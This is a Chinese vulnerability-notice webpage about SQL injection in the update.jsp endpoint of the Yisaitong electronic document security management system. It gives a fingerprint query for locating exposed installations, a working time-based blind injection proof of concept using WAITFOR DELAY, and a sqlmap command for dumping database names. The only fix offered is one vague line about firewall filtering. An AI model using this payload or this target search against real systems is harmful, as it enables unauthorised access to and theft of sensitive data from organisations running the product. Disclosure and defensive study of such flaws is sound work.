当前位置: 首页 > news >正文

亿赛通电子文档安全管理系统 Update.jsp SQL注入

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现页面

0x05 漏洞修复建议


0x01 漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
 

0x02 影响产品

  1. 亿赛通电子文档安全管理系统

0x03 语法特征

  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面
 

图片


POC

 
  1. CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
 

图片

图片

 
  1. python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

  2. ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

图片

0x05 漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测

图片

                                                   没看够~?欢迎关注扫一扫~

http://www.lryc.cn/news/199033.html

相关文章:

  • 神经网络中的反向传播:综合指南
  • 协同创新、奔赴未来——“华为云杯”2023人工智能创新应用大赛华丽谢幕
  • 介绍Node.js中fs模块 代码和注释。
  • 【QT 读取JSON】 深入浅出 使用QT内置的QJson模块解析Json文件 匠心之作
  • 初识javaweb2 tomcat
  • 使用OPENROWSET :在一个数据库中查询另一个数据库的数据
  • 基于STM32设计的智慧农业管理系统(ESP8266+腾讯云微信小程序)
  • Flutter视图原理之三棵树的建立过程
  • 详细解析冒泡排序,JS如何基本实现的。
  • 如何消除CSDN博文代码中自动添加的行号
  • 定制效果在线定制印刷系统源码 DIY在线定制系统源码 云印刷定制系统源码手机、PC端实时互通
  • 算法|每日一题|同积元组|哈希统计
  • 最新AI创作系统ChatGPT网站H5源码V2.6.4+搭建部署教程+支持GPT4.0+支持ai绘画(Midjourney)/支持Prompt预设应用
  • 最新!两步 永久禁止谷歌浏览器 Google Chrome 自动更新
  • 在Java中线程和进程的区别
  • 【高危安全通告】Oracle 10月月度安全漏洞预警
  • 卷王问卷考试系统SurveyKing,开源调查问卷和考试系统源码
  • uniapp开发微信小程序,webview内嵌h5,h5打开pdf地址,解决方案
  • Swift使用Embassy库进行数据采集:热点新闻自动生成器
  • 【AIGC核心技术剖析】改进视频修复的传播和变压器(动态滤除环境中的物体)
  • Win系统VMware虚拟机安装配置(二)
  • 基于枚举实现的观察者模式
  • 基于神经网络的图像识别研究
  • 基于SSM的工资管理系统
  • 微服务负载均衡实践
  • php定时任务
  • 2.2 如何使用FlinkSQL读取写入到文件系统(HDFS\Local\Hive)
  • call函数和apply函数的区别
  • JavaCV踩坑之路1——Mac上安装OpenCV
  • es6(三)——常用es6(函数、数组、对象的扩展)